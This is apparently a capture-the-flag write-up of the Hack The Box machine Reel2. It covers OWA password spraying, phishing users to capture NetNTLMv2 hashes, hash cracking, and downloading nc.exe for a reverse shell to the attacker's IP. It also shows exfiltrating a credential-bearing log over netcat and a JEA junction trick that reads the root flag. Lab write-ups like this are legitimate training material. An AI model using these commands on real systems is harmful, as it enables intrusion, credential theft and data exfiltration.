Introduction@Reel2:~$
| Column | Details |
|---|---|
| Name | Reel2 |
| IP | 10.10.10.210 |
| Points | 40 |
| Os | Windows |
| Difficulty | Hard |
| Creator | cube0x0 |
| Out On | 03 Oct 2020 |
Summary
-
Nmapshows the 3 Ports open. -
Gather all the
user namein a txt file. - Valid login Creds Obtianed
-
login to OWA in
https://10.10.10.210/OWA -
Found k.svensson hash
with help of
Phising -
Cracking the obtained ntml hash and get the password
kittycat1 -
Login to the machine with the
PSSession - Getting
user.txt -
looking at the
000003.logthe password for thejea_test_accountis enumerated -
Found the password of
jea_test_accountIn log file -
Looking at the basic
jae_test_account.psrcand .pssc the Check-File commad loads if the contents are fom the"C:\ProgramData". -
Create a
Symlink -
Using
Check-Filecommand to enumerate. -
Get
root.txt
Pwned
Recon
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #nmap -sC -sV -oA nmap/result 10.10.10.210
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-10 09:48 EDT
Nmap scan report for 10.10.10.210
Host is up ( latency).
Not shown: 991 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp open ssl/https?
|_ssl-date: 2020-10-10T04:27:32+00:00; -9h23m25s from scanner time.
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
|_http-title: Welcome | Wallstant
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -9h23m25s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address ( host up) scanned in 213.23 seconds
So basically Three ports are opened
80:http
and 443:https
8080:http-proxy
Port-80
Enumerating http But He Said 403-Forbidden
Enumerating HTTPS
.
Let's use gobuster to find Directories
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.210
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/10 10:04:31 Starting gobuster
===============================================================
/public (Status: 302)
/exchange (Status: 302)
/Public (Status: 302)
/rpc (Status: 401)
/owa (Status: 301)
Let's Go to /owa First
Hmmm , a login page. Let's Try somesql injection
But nothing is work.
Port-8080
Lets Create A Account On SignUp Page.
Hmm.. In Home Page There Are So Many Users
Let's Gather All Users and Create A user.txt
Example:
1
2
3
sven
svensson
s.svensson
If We See All Posts In The Posts Tab, The svensson user post gave us a hint This summer is so hot!
So, Let's Create A pass.txt with this hint.
1
2
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #cat /usr/share/wordlists/rockyou.txt | grep Summer > pass.txt
With the user.txt and pass.txt, lets bruteforce the OWA login
But We Don't bruteforce OWA login with wfuzz and hydra. we need to install a tool called SprayingToolkit.
Link : SprayingToolkit
But, Before Running this tool install the requirements of this tool.
1
pip3 install -r requirements.txt
Now, Let's run the tool
1
python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
and after a couple of minutes we got the username and password.
s.svenssonPassword = Summer2020
Let's Login With This credentials on port 443
Hmm, site is on another language. Let's open it in chromium so we will understand what's going on.
Now I understand what's going on here it's a mail server i think we need to do some Phising stuff.
If you don't known about that here is an interesting article.
Link : NetNTLMv2 hash stealing using Outlook
So what we can do now compiling a new message
message.
2. Select all user with Control+A then click on To button on bottom. So this will send our email to each and every user .
3. Give the subject as you wish and in the body enter your htb ip like http://10.10.XX.XX
Important : Before Sending this email start your responder.
1
responder -I tun0
Boom, After couple of minutes we get the response back.
But first we need to crack this hash. But first identify what type of hash is this.
So Now we known this is NTLMv2 Hash
hashcat example hashes
Link : Example hashes
So Now we known this hash is a crackable hash. So Let's Crack it
1
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
And we crack the hash.
username = k.svensson
password = kittycat1
Evil-WinRm is not work at this situation because port 5985 is not open.
So we using Linux Powershell to login.
But First Install powershell for Linux
1
2
sudo apt install gss-ntlmssp
sudo apt-get install powershell
After installation you can access powershell with pwsh.
Now, Let's login with pwsh.
1
2
3
4
5
6
7
8
9
10
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #pwsh
PS /root/Desktop/HTB/reel2 > $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
PowerShell credential request
Enter your credentials.
Password for user k.svensson: *********
PS /root/Desktop/HTB/reel2 > Enter-PSSession $offsec_session
[10.10.10.210]: PS>
Now commands like dir, ls, cd, whoami wont work. $env:username and $env:domainname works.
We need to Execute powershell commands with the script block
Link : behavior of Out-Default
So we use &{ command }.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[10.10.10.210]: PS> &{ cd ../Desktop }
[10.10.10.210]: PS> &{ ls }
Directory: C:\Users\k.svensson\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/30/2020 1:19 PM 2428 Sticky Notes.lnk
-ar--- 10/9/2020 7:21 AM 34 user.txt
[10.10.10.210]: P> &{ type user.txt}
Now, let's change this interface to shell interface for that we need to transfer a nc.exe file and get a reverse shell.
1. open a simple http server But i use apache2 service.
2. transfer nc.exe to the system
netcat listener.
1
2
3
[10.10.10.210]: PS> &{ iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
[10.10.10.210]: PS> &{ cd 'C:\Windows\System32\spool\drivers\color\'}
[10.10.10.210]: PS> &{ ./nc.exe 10.10.xx.xx 9001 -e powershell.exe}
Let's check our netcat listener
Boom guys, we got the shell now we don't use this command &{ },
Now the reverse shell is obtained. It's time for Enumeration.
We Found nothing in our Enumeration proccess Let's check the log if anything interesting there.
1
2
cd /
dir /s /b *.log
they show us 000003.log file in our current user directory Let's get on that.
but when we use type command to see inside 000003.log file it's give me gibberish.
So we need to get that file in our local machine.
So we use nc.exe to transfer the file.
1. open a listener in your local machine to get the file content.
1
nc -nvlp 1234 > 000003.log
2. In the window reverse shell type this command.
1
2
3
PS C:\> cmd
C:\> cd "C:\Windows\System32\spool\drivers\color\"
nc.exe 10.10.XX.XX < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"
Let's check our netcat listener.
Let's use our strings command to see content in 000003.log file.
We got the username and password
jea_test_account
password = Ab!Q@vcg^%@#1
Privilege escalation
Looking at the basic jae_test_account.psrc and .pssc the Check-File commad loads if the contents are fom the "C:\ProgramData".
So what we can do we need to create a Symlink to ProgramData directory with Administrator directory.
Important : be sure you run this command in PS
1
New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
Now command will Executed successfully.
So when we login with jea_test_account account we can access Administrator directory also.
Now we need to login with jea_test_account account. So let's open a new terminal and type pwsh.
command one by one.
1
2
3
4
5
6
7
┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #pwsh
PS /root/Desktop/HTB/reel2 > $username = "jea_test_account"
PS /root/Desktop/HTB/reel2 > $password = ConvertTo-SecureString"Ab!Q@vcg^%@#1"-AsPlainText-Force
PS /root/Desktop/HTB/reel2 > $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)
PS /root/Desktop/HTB/reel2 > Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate
[10.10.10.210]: PS> Check-File C:\programdata\root\Desktop\root.txt
And we pwned it …….
If u liked the writeup.Support a Student to Get the OSCP-Cert
Donation for OSCP
Resources
| Topic | Url |
|---|---|
| SprayingToolkit | https://github.com/byt3bl33d3r/SprayingToolkit |
| NetNTLMv2 hash | https://www.ired.team/offensive-security/initial-access/netntlmv2-hash-stealing-using-outlook |
| Example hashes | https://hashcat.net/wiki/doku.php?id=example_hashes |
| behavior of Out-Default | https://stackoverflow.com/questions/18082746/can-you-change-the-...... |